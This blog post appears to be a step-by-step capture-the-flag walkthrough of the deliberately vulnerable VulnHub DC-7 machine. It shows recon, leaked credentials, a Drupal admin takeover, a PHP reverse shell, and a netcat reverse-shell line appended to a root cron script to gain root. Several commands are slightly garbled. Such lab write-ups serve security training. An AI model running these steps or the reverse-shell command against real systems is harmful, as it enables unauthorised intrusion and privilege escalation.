CTF Walk Through - DC7

CTF Walk Through | HackProof Academy | [email protected]


2 subscriber(s)

23/12/2024 Shad Hussain Knowledge Views 74 Comments 0 Analytics Video English DMCA Add Favorite Copy Link

CTF Walk Through - DC7 - VulnHub


Machine Link : https://www.vulnhub.com/entry/dc-7,356/


STEP1
nmap 192.168.31.253 -p- -Pn -A -T4 -sSV
FINDING
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Welcome to DC-7 | D7
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
---------------------------------------------------------------------------------------------------------
STEP2
http://192.168.31.253/

HINT : What you will have to do, is to think "outside" the box. @DC7USER
google @DC7USER
https://github.com/Dc7User

https://github.com/Dc7User/staffdb

https://github.com/Dc7User/staffdb/blob/master/config.php

FINDING
?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?
---------------------------------------------------------------------------------------------------------
STEP3
ssh [email protected]
pwd :  MdR3xOgB7#dW
---------------------------------------------------------------------------------------------------------
STEP4
cd /home/dc7user/backups
ls
FINDING
website.sql.gpg  website.tar.gz.gpg
---------------------------------------------------------------------------------------------------------
STEP5
cd /opt/scripts
ls -la
backups.sh
cat backups.sh
FINDING
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
---------------------------------------------------------------------------------------------------------
STEP6
cd /home/dc7user/backups
gpg --decrypt website.sql.gpg  /tmp/website.sql
PickYourOwnPassword -- is the passphrase
ls -la
website.sql  website.sql.gpg  website.tar.gz.gpg
head -n 50 website.sql
cat website.sql | grep "Table structure for table"
FINDING
-- Table structure for table `config`
-- Table structure for table `url_alias`
-- Table structure for table `users`
-- Table structure for table `users_data`
-- Table structure for table `users_field_data`
---------------------------------------------------------------------------------------------------------
STEP7
cat website.sql | grep -A 30 "Table structure for table users"
cat website.sql | grep -A 40 "Table structure for table `users_field_data`"
open the website.sql on mouse pad and go to 2213 line
FINDING
INSERT INTO `users_field_data` VALUES 
admin,$S$Ead.KmIcT/yfKC.1H53aDPJasaD7o.ioEGiaPy1lLyXXAJC/Qi4F
dc7user,$S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI
use -- https://hashcat.net/wiki/doku.php?id=example_hashes

7900	Drupal7	$S$C33783772bRXEx1aCsvY.dqgaaSu76XmVlKrW9Qu8IQlvxHlmzLf
nothing works here 
---------------------------------------------------------------------------------------------------------
STEP8
using drush command can we change the password just google it
cd /var/www/html
drush user-password admin --password=password123
Changed password for admin                                                    [success]
---------------------------------------------------------------------------------------------------------
STEP9
login -- http://192.168.0.109/user/login

admin
password123
got to -- http://192.168.31.154/admin/modules/install

---------------------------------------------------------------------------------------------------------
STEP10
go to -- https://www.drupal.org/project/php/releases/8.x-1.0

download the php module tar.gz 
install the module
on update screen select "Enable newly added modules" option and install it from the button at the bottom
then
http://192.168.31.154/admin/content

http://192.168.31.154/node/add

go to -- http://192.168.31.154/node/add/page

title will be "rshell"
paste the content of all the php reverse shell code
select php code in the Text format
open nc listner on new terminal
and click the PREVIEW button on the drupal site and the revers shell
---------------------------------------------------------------------------------------------------------
STEP11
python -c import pty; pty.spawn("/bin/bash")
cd /tmp
wget https://github.com/DominicBreuker/pspy/releases

download pspy64
chmod +x pspy64
./pspy64
moniter the schedule file run every time
FINDING
/opt/scripts/backups.sh
************************
whoami
www-data
cd /opt/scripts
ls
backups.sh
ls -la backups.sh
-rwxrwxr-x 1 root www-data 555 Dec 18 03:04 backups.sh
we can now write to this file and can take a new reverse shell on another terminal
---------------------------------------------------------------------------------------------------------
STEP12
echo nc 192.168.0.102 4444 -e /bin/sh  backups.sh
open nc -nvlp 4444 on new terminal
and wait
as backup.sh run as scheduled you will get a reverse root shell
---------------------------------------------------------------------------------------------------------
STEP13
on new root terminal
whoami
root
cd root
cat theflag.txt
FINDING
888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

Im sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.
-------------------------------------------------------------------------------------------------------

	12.12.2024 Shad Hussain Readers 139
CTF Walk Through - OverlayFS - THM Room Link : https://tryhackme.com/r/room/overlayfs STEP1 Username: overlay ..... Read all...

	06.12.2024 Manorama Kumari Readers 238
*पति की आवश्यकता क्यों ? :: 😊😊 एक महिला एक मनोचिकित्सक के पास गई और उससे बोली कि *"मैं शादी नहीं करना चाहती.. ..... Read all...

	06.12.2024 Shad Hussain Readers 174
CTF Walk Through - DC6 - VulnHub Machine Link : https://www.vulnhub.com/entry/dc-6,315/ STEP1 arp-scan -l F ..... Read all...

	05.12.2024 Shad Hussain Readers 187
CTF Walk Through - Ice - THM Room Link : https://tryhackme.com/r/room/ice STEP1 nmap -Pn -sSV 10.10.98.2 ..... Read all...

	05.12.2024 Shad Hussain Readers 196
CTF Walk Through - LazyAdmin - THM Room Link : https://tryhackme.com/r/room/lazyadmin STEP1 nmap 10.10.87.228 ..... Read all...

	04.12.2024 Shad Hussain Readers 204
CTF Walk Through - Vulnversity - THM Room Link : https://tryhackme.com/r/room/vulnversity STEP1 nmap -p- -sSV 10 ..... Read all...

	03.12.2024 Shad Hussain Readers 227
CTF Walk Through - EVM - VulnHub Machien Link : https://www.vulnhub.com/entry/evm-1,391/ step1 : arp-scan ..... Read all...

	02.12.2024 Shad Hussain Readers 220
CTF Walk Through - DC3 - VulnHub Machine Link : https://www.vulnhub.com/entry/dc-32,312/ STEP1 nmap 192.168. ..... Read all...

	01.12.2024 Shad Hussain Readers 277
CTF Walk Through - Cybersploit-1 - Vulnhub machine link : https://www.vulnhub.com/entry/cybersploit-1,506/ step1 : US ..... Read all...

WhatsApp no. else use your mail id to get the otp...! Please tick to get otp in your mail id...!

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)

Related articles